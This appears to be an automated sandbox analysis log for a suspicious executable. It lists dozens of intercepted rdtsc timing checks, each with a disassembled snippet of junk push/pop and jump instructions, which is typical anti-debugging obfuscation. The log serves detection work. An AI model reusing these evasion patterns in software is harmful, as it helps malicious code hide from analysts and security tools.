Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A2B71 second address: 7A2B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD0F8CDABE6h 0x0000000a jmp 00007FD0F8CDABEFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C8851 second address: 6C8857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6E6C second address: 7B6E8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007FD0F8CDABE6h 0x00000009 pop edx 0x0000000a jmp 00007FD0F8CDABEAh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007FD0F8CDABE6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6E8B second address: 7B6EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD0F8E1A7AAh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6EA1 second address: 7B6EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6EA5 second address: 7B6EB2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6EB2 second address: 7B6EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D104F second address: 6D1055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D1055 second address: 6D105C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D105C second address: 6D1076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6C96 second address: 7B6CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007FD0F8CDABF0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6CAD second address: 7B6CD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8E1A7AFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6CD4 second address: 7B6CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BF0DF second address: 7BF0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BD8E6 second address: 7BD91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD0F8CDABE6h 0x0000000a jmp 00007FD0F8CDABF4h 0x0000000f popad 0x00000010 jmp 00007FD0F8CDABF9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BD91E second address: 7BD93D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD0F8E1A7B3h 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDD56 second address: 7BDD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1EF3 second address: 7C1EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4FB6 second address: 7D4FC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4FC0 second address: 7D4FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4FC4 second address: 7D5022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF3h 0x00000007 jl 00007FD0F8CDABE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007FD0F8CDABEFh 0x00000015 jg 00007FD0F8CDABE6h 0x0000001b pop ebx 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push edx 0x00000022 pop edx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 jmp 00007FD0F8CDABF1h 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 pushad 0x00000032 jne 00007FD0F8CDABE6h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D4E29 second address: 7D4E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD49F second address: 7CD4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD4A3 second address: 7CD4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD4AF second address: 7CD4B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CD4B3 second address: 7CD4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2AD6 second address: 7E2B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8CDABF4h 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007FD0F8CDABEEh 0x00000012 jnl 00007FD0F8CDABE6h 0x00000018 pushad 0x00000019 popad 0x0000001a jnp 00007FD0F8CDABEEh 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E40E8 second address: 7E40EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE5D5 second address: 7FE5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD44B second address: 7FD451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD451 second address: 7FD456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FD756 second address: 7FD75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDA32 second address: 7FDA36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDD6B second address: 7FDD6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDD6F second address: 7FDD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD0F8CDABF5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDD8D second address: 7FDD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FDF38 second address: 7FDF43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE311 second address: 7FE316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE316 second address: 7FE323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FE323 second address: 7FE348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c je 00007FD0F8E1A7A6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 jbe 00007FD0F8E1A7A6h 0x0000001c popad 0x0000001d jo 00007FD0F8E1A7AEh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 800FB1 second address: 800FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804361 second address: 80436B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0F8E1A7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80436B second address: 804371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803EB2 second address: 803EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803EBB second address: 803EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803EBF second address: 803EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC01B4 second address: 4EC01D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC01D1 second address: 4EC01E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC01E1 second address: 4EC01E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF05E5 second address: 4EF0619 instructions: 0x00000000 rdtsc 0x00000002 call 00007FD0F8E1A7ABh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov eax, 03D9ACEBh 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD0F8E1A7B4h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0619 second address: 4EF061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF061D second address: 4EF0623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0623 second address: 4EF0629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0629 second address: 4EF062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF062D second address: 4EF0631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0631 second address: 4EF0648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push edi 0x0000000c mov edi, esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ch, 78h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0648 second address: 4EF0651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2AAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8015E second address: 4E80164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80164 second address: 4E801E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8CDABEBh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FD0F8CDABF6h 0x00000015 mov ebp, esp 0x00000017 jmp 00007FD0F8CDABF0h 0x0000001c push dword ptr [ebp+04h] 0x0000001f jmp 00007FD0F8CDABF0h 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 jmp 00007FD0F8CDABF0h 0x0000002c push dword ptr [ebp+08h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FD0F8CDABF7h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA0BFF second address: 4EA0C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA0C03 second address: 4EA0C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA0C09 second address: 4EA0C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB0251 second address: 4EB0257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB0257 second address: 4EB025B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EB025B second address: 4EB025F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EF0509 second address: 4EF0566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FD0F8E1A7B9h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f jmp 00007FD0F8E1A7ACh 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007FD0F8E1A7B0h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD0F8E1A7B7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC04A5 second address: 4EC04B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABF0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC04B9 second address: 4EC04FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007FD0F8E1A7B4h 0x00000012 mov bx, ax 0x00000015 pop eax 0x00000016 mov ebx, 21965A32h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD0F8E1A7ABh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC04FB second address: 4EC0501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0501 second address: 4EC0538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007FD0F8E1A7B0h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 pushad 0x00000015 mov esi, 3FF7D3FDh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0538 second address: 4EC053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA056F second address: 4EA05B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushfd 0x00000007 jmp 00007FD0F8E1A7B3h 0x0000000c or ecx, 35E789DEh 0x00000012 jmp 00007FD0F8E1A7B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA05B0 second address: 4EA05E5 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FD0F8CDABF7h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD0F8CDABF0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EA05E5 second address: 4EA05F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC005B second address: 4EC0101 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 pushfd 0x00000006 jmp 00007FD0F8CDABF8h 0x0000000b or al, 00000008h 0x0000000e jmp 00007FD0F8CDABEBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FD0F8CDABF4h 0x0000001f xor cl, 00000068h 0x00000022 jmp 00007FD0F8CDABEBh 0x00000027 popfd 0x00000028 jmp 00007FD0F8CDABF8h 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov ecx, edi 0x00000035 pushfd 0x00000036 jmp 00007FD0F8CDABF9h 0x0000003b sbb ah, FFFFFFE6h 0x0000003e jmp 00007FD0F8CDABF1h 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0101 second address: 4EC0126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC037C second address: 4EC0382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0382 second address: 4EC0391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0391 second address: 4EC0395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE06FF second address: 4EE072C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE072C second address: 4EE0750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABECh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE0750 second address: 4EE0756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE0756 second address: 4EE07A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FD0F8CDABF9h 0x00000017 adc esi, 657A9726h 0x0000001d jmp 00007FD0F8CDABF1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE07A2 second address: 4EE07A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE07A8 second address: 4EE07F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [775165FCh] 0x0000000d pushad 0x0000000e call 00007FD0F8CDABF0h 0x00000013 mov edx, eax 0x00000015 pop eax 0x00000016 popad 0x00000017 test eax, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007FD0F8CDABF6h 0x00000021 call 00007FD0F8CDABF2h 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE07F9 second address: 4EE07FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE07FF second address: 4EE0816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD16B28DD45h 0x0000000e pushad 0x0000000f push ecx 0x00000010 mov dh, 09h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 mov cl, bl 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE0816 second address: 4EE088D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, eax 0x00000009 pushad 0x0000000a mov ebx, ecx 0x0000000c pushfd 0x0000000d jmp 00007FD0F8E1A7B8h 0x00000012 or esi, 2D25D248h 0x00000018 jmp 00007FD0F8E1A7ABh 0x0000001d popfd 0x0000001e popad 0x0000001f xor eax, dword ptr [ebp+08h] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FD0F8E1A7B5h 0x00000029 sbb ecx, 11F99F66h 0x0000002f jmp 00007FD0F8E1A7B1h 0x00000034 popfd 0x00000035 movzx esi, bx 0x00000038 popad 0x00000039 and ecx, 1Fh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
